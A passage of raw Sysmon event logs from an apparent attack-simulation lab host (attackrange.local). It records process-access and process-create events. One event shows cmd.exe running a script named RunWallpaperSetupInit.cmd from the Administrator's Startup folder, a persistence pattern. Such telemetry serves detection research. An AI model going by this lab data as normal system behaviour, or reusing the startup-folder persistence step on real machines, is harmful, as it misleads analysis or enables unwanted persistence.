Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.663{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9415-6005-1005-00000000A301}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:45.523{59A5CD1D-9415-6005-1005-00000000A301}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.976{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.976{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.960{59A5CD1D-9416-6005-1405-00000000A301}69286972C:\Windows\system32\conhost.exe{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.960{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-9416-6005-1205-00000000A301}6904C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.960{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9416-6005-1205-00000000A301}6904C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9416-6005-1205-00000000A301}6904C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9416-6005-1405-00000000A301}6928C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.945{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9416-6005-1205-00000000A301}6904C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-93FA-6005-FC04-00000000A301}37846292C:\Windows\Explorer.EXE{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\Explorer.EXE+91a26|C:\Windows\Explorer.EXE+11a0b|C:\Windows\Explorer.EXE+1187e|C:\Windows\Explorer.EXE+f7c2|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 
154100x800000000000000013343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.946{59A5CD1D-9416-6005-1305-00000000A301}6912C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000013342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.945{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9416-6005-1205-00000000A301}6904C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:46.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9416-6005-1205-00000000A301}6904C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.929{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.929{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.820{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.804{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.804{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.804{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+d1597|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952AF645)|UNKNOWN(FFFFD3D9952B2488)|UNKNOWN(FFFFD3D9952B6879)|UNKNOWN(FFFFD3D9952B73A3)|UNKNOWN(FFFFD3D9952A9320)|UNKNOWN(FFFFD3D9952A77DB)|UNKNOWN(FFFFD3D99522902A)|UNKNOWN(FFFFD3D9952A83D3)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+1524 10341000x800000000000000013334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.788{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.788{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.788{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+d141d|C:\Windows\System32\SHELL32.dll+d1ac3|C:\Windows\System32\SHELL32.dll+d19f4|C:\Windows\System32\SHELL32.dll+d12a2|C:\Windows\SYSTEM32\IEFRAME.dll+11dd18|C:\Windows\SYSTEM32\IEFRAME.dll+d77d2|C:\Windows\SYSTEM32\IEFRAME.dll+d9f4e|C:\Windows\SYSTEM32\IEFRAME.dll+da7d4|C:\Windows\SYSTEM32\IEFRAME.dll+6851e|C:\Windows\SYSTEM32\IEFRAME.dll+de9b1|C:\Windows\SYSTEM32\IEFRAME.dll+d0abd|C:\Windows\SYSTEM32\IEFRAME.dll+d1939|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b2d|C:\Windows\SYSTEM32\IEFRAME.dll+d970b|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8 10341000x800000000000000013331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.788{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+d1399|C:\Windows\System32\SHELL32.dll+d1ac3|C:\Windows\System32\SHELL32.dll+d19f4|C:\Windows\System32\SHELL32.dll+d12a2|C:\Windows\SYSTEM32\IEFRAME.dll+11dd18|C:\Windows\SYSTEM32\IEFRAME.dll+d77d2|C:\Windows\SYSTEM32\IEFRAME.dll+d9f4e|C:\Windows\SYSTEM32\IEFRAME.dll+da7d4|C:\Windows\SYSTEM32\IEFRAME.dll+6851e|C:\Windows\SYSTEM32\IEFRAME.dll+de9b1|C:\Windows\SYSTEM32\IEFRAME.dll+d0abd|C:\Windows\SYSTEM32\IEFRAME.dll+d1939|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b2d|C:\Windows\SYSTEM32\IEFRAME.dll+d970b|C:\Windows\SYSTEM32\IEFRAME.dll+1196f|C:\Windows\SYSTEM32\IEFRAME.dll+129b8 10341000x800000000000000013330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:46.788{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+d137d|C:\Windows\System32\SHELL32.dll+d1ac3|C:\Windows\System32\SHELL32.dll+d19f4|C:\Windows\System32\SHELL32.dll+d12a2|C:\Windows\SYSTEM32\IEFRAME.dll+11dd18|C:\Windows\SYSTEM32\IEFRAME.dll+d77d2|C:\Windows\SYSTEM32\IEFRAME.dll+d9f4e|C:\Windows\SYSTEM32\IEFRAME.dll+da7d4|C:\Windows\SYSTEM32\IEFRAME.dll+6851e|C:\Windows\SYSTEM32\IEFRAME.dll+de9b1|C:\Windows\SYSTEM32\IEFRAME.dll+d0abd|C:\Windows\SYSTEM32\IEFRAME.dll+d1939|C:\Windows\SYSTEM32\IEFRAME.dll+d1e22|C:\Windows\SYSTEM32\IEFRAME.dll+ceef8|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000013329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 